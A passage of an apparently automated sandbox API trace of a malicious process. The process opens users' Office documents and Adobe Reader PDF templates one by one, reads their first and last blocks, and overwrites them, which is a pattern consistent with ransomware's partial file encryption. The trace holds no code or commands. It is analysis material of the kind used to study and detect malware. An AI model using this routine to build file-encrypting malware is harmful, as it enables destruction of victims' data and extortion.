lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8900 [0060.395] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.395] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.395] ReleaseMutex (hMutex=0x168) returned 1 [0060.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XKEQC_0.xlsx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0060.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XKEQC_0.xlsx", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XKEQC_0.xlsx", lpUsedDefaultChar=0x0) returned 12 [0060.395] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.396] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7900 [0060.396] ReadFile (in: hFile=0x1b8, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.396] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7900 [0060.397] WriteFile (in: hFile=0x1b8, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.397] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.397] WriteFile (in: hFile=0x1b8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.397] CloseHandle (hObject=0x1b8) returned 1 [0060.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\q6EU42d7xh5nqo7LCE.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\q6eu42d7xh5nqo7lce.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.399] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.399] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x185fa [0060.399] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.399] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.399] ReleaseMutex (hMutex=0x168) returned 1 [0060.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="q6EU42d7xh5nqo7LCE.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0060.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="q6EU42d7xh5nqo7LCE.docx", cchWideChar=23, lpMultiByteStr=0x1f8867c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q6EU42d7xh5nqo7LCE.docx", lpUsedDefaultChar=0x0) returned 23 [0060.399] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.400] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x175fa [0060.400] ReadFile (in: hFile=0x1b8, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.400] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x175fa [0060.401] WriteFile (in: hFile=0x1b8, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.401] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.401] WriteFile (in: hFile=0x1b8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.401] CloseHandle (hObject=0x1b8) returned 1 [0060.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\9S098_ao.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\9s098_ao.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.403] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.404] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11c77 [0060.404] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.404] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.404] ReleaseMutex (hMutex=0x168) returned 1 [0060.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9S098_ao.odt", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0060.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9S098_ao.odt", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9S098_ao.odt", lpUsedDefaultChar=0x0) returned 12 [0060.404] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.405] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10c77 [0060.405] ReadFile (in: hFile=0x1b8, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.405] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10c77 [0060.405] WriteFile (in: hFile=0x1b8, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.406] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.406] WriteFile (in: hFile=0x1b8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.407] CloseHandle (hObject=0x1b8) returned 1 [0060.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.410] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.410] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11581 [0060.410] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.410] ReleaseMutex (hMutex=0x168) returned 1 [0060.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0060.410] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.415] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10581 [0060.415] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ec4338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec4338*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.418] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10581 [0060.419] WriteFile (in: hFile=0x1b8, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.419] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.419] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.420] CloseHandle (hObject=0x1b8) returned 1 [0060.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.425] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.425] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x101ce [0060.426] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.426] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.426] ReleaseMutex (hMutex=0x168) returned 1 [0060.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0060.426] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.637] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf1ce [0060.638] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.795] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf1ce [0060.833] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.833] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.833] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.833] CloseHandle (hObject=0x1b8) returned 1 [0060.851] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.852] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.852] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x10596 [0060.852] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.852] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.852] ReleaseMutex (hMutex=0x168) returned 1 [0060.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7324c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0060.852] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.861] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf596 [0060.861] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.862] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf596 [0060.862] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.862] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.863] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.863] CloseHandle (hObject=0x1b8) returned 1 [0061.231] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.232] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.232] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5404 [0061.232] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.232] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.232] ReleaseMutex (hMutex=0x168) returned 1 [0061.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0061.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0061.232] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.234] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4404 [0061.235] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.235] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4404 [0061.235] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.236] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.236] WriteFile (in: hFile=0x1c4, lpBuffer=0x1ec5568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0061.236] CloseHandle (hObject=0x1c4) returned 1 [0061.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.238] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.238] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x25d4a [0061.238] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.238] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.238] ReleaseMutex (hMutex=0x168) returned 1 [0061.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0061.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7324c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0061.239] ReadFile (in: hFile=0x1c4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0061.243] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x24d4a [0061.243] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, 